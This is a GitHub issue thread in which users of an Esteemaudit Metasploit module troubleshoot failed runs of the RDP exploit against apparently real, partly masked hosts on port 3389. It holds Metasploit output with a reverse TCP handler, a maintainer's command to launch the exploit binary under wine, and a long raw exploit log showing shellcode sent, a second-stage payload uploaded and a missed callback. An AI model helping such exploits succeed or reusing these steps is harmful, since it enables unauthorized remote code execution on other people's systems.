### ISSUE TITLE
hello brother <3  I want to ask you , this errors why ???

### ISSUE THREAD

**Issue by megylon** [BlackMathIT/Esteemaudit-Metasploit#3]
InConfig: Esteemaudit-2.1.0.xml is not a valid value
--------------------------------------------------------------------------------------------------------------
[*] Started reverse TCP handler on 192.168.1.11:4444 
[*] 177.xxxxxxxxxxxx:3389 - Generating Esteemaudit XML data 
[*] 177.xxxxxxxxxxxxx:3389 - Generating payload DLL for Esteemaudit 
[*] 177.xxxxxxxxxxxx:3389 - Writing DLL in /root/.wine/drive_c/shell.dll 
[*] 177.xxxxxxxxxxxxxxx:3389 - Launching Esteemaudit... 
[+] 177.xxxxxxxxxxxx:3389 - We are inside, waiting for meterpreter... 
[*] Exploit completed, but no session was created. 
msf exploit(esteemaudit) >﻿

**Comment by BlackMathIT** [comment]
Hi @megylon try to do this:
wine /usr/share/esteemaudit/Esteemaudit-2.1.0.exe
and paste the output here please

**Comment by megylon** [comment]
InConfig: Esteemaudit-2.1.0.xml is not a valid value ?????

**Comment by BlackMathIT** [comment]
Do you have a Esteemaudit-2.1.0.xml file in /usr/share/esteemaudit/ ?

**Comment by megylon** [comment]
Yes (Esteemaudit-2.1.0.xml  , Esteemaudit-2.1.0.0.Skeleton.xml)  have all xml files ?

**Comment by drax88** [comment]
[*] exec: wine /usr/share/esteemaudit/Esteemaudit-2.1.0.exe

[*] Creating callback socket
	[+] Listening on 0.0.0.0:0
	[+] Callback socket creation complete
	[+] Connected to target 8.2XX.XXX.XXX:3389
	[+] Sending Space Bar
[*] Building exploit buffer.
	[+] Set Auth Code to: 0x23120092
	[+] Set XOR Mask to: 0xC8729A90
	[+] Successfully opened MigrateProcessDLL
	[+] Successfully opened CallbackPayloadDLL
	[+] Exploit buffer created.
	[+] Sending Enter key
	[+] SELECT_FILE - GPK Card MF
	[+] GET_RESPONSE - data unit size 
	[+] GET_RESPONSE - serial number 
	[+] SELECT_FILE - GPK Card MF
	[+] SELECT_FILE - Don't care which
	[+] GET_RESPONSE - from SELECT_FILE 
	[+] READ_BINARY - unknown offset
	[+] SELECT_FILE - Don't care which
	[+] GET_RESPONSE - from SELECT_FILE 
	[+] READ_BINARY - start of file 
	[+] Shellcode sent
	[+] SELECT_FILE - GPK Card MF
[*] First stage complete
	[+] Uploading Second Stage 0/21690 (0.00%)
	[+] Uploading Second Stage 384/21690 (1.77%)
	[+] Uploading Second Stage 768/21690 (3.54%)
	[+] Uploading Second Stage 1152/21690 (5.31%)
	[+] Uploading Second Stage 1536/21690 (7.08%)
	[+] Uploading Second Stage 1920/21690 (8.85%)
	[+] Uploading Second Stage 2304/21690 (10.62%)
	[+] Uploading Second Stage 2688/21690 (12.39%)
	[+] Uploading Second Stage 3072/21690 (14.16%)
	[+] Uploading Second Stage 3456/21690 (15.93%)
	[+] Uploading Second Stage 3840/21690 (17.70%)
	[+] Uploading Second Stage 4224/21690 (19.47%)
	[+] Uploading Second Stage 4608/21690 (21.24%)
	[+] Uploading Second Stage 4992/21690 (23.02%)
	[+] Uploading Second Stage 5376/21690 (24.79%)
	[+] Uploading Second Stage 5760/21690 (26.56%)
	[+] Uploading Second Stage 6144/21690 (28.33%)
	[+] Uploading Second Stage 6528/21690 (30.10%)
	[+] Uploading Second Stage 6912/21690 (31.87%)
	[+] Uploading Second Stage 7296/21690 (33.64%)
	[+] Uploading Second Stage 7680/21690 (35.41%)
	[+] Uploading Second Stage 8064/21690 (37.18%)
	[+] Uploading Second Stage 8448/21690 (38.95%)
	[+] Uploading Second Stage 8832/21690 (40.72%)
	[+] Uploading Second Stage 9216/21690 (42.49%)
	[+] Uploading Second Stage 9600/21690 (44.26%)
	[+] Uploading Second Stage 9984/21690 (46.03%)
	[+] Uploading Second Stage 10368/21690 (47.80%)
	[+] Uploading Second Stage 10752/21690 (49.57%)
	[+] Uploading Second Stage 11136/21690 (51.34%)
	[+] Uploading Second Stage 11520/21690 (53.11%)
	[+] Uploading Second Stage 11904/21690 (54.88%)
	[+] Uploading Second Stage 12288/21690 (56.65%)
	[+] Uploading Second Stage 12672/21690 (58.42%)
	[+] Uploading Second Stage 13056/21690 (60.19%)
	[+] Uploading Second Stage 13440/21690 (61.96%)
	[+] Uploading Second Stage 13824/21690 (63.73%)
	[+] Uploading Second Stage 14208/21690 (65.50%)
	[+] Uploading Second Stage 14592/21690 (67.28%)
	[+] Uploading Second Stage 14976/21690 (69.05%)
	[+] Uploading Second Stage 15360/21690 (70.82%)
	[+] Uploading Second Stage 15744/21690 (72.59%)
	[+] Uploading Second Stage 16128/21690 (74.36%)
	[+] Uploading Second Stage 16512/21690 (76.13%)
	[+] Uploading Second Stage 16896/21690 (77.90%)
	[+] Uploading Second Stage 17280/21690 (79.67%)
	[+] Uploading Second Stage 17664/21690 (81.44%)
	[+] Uploading Second Stage 18048/21690 (83.21%)
	[+] Uploading Second Stage 18432/21690 (84.98%)
	[+] Uploading Second Stage 18816/21690 (86.75%)
	[+] Uploading Second Stage 19200/21690 (88.52%)
	[+] Uploading Second Stage 19584/21690 (90.29%)
	[+] Uploading Second Stage 19968/21690 (92.06%)
	[+] Uploading Second Stage 20352/21690 (93.83%)
	[+] Uploading Second Stage 20736/21690 (95.60%)
	[+] Uploading Second Stage 21120/21690 (97.37%)
	[+] Uploading Second Stage 21504/21690 (99.14%)
[*] Waiting for callback from second stage payload.
	[-] Callback timeout
	[-] Failed to receive a callback from target!
	[-] FindCallbackSocket failed
[-] Exploit NOT successful :-(
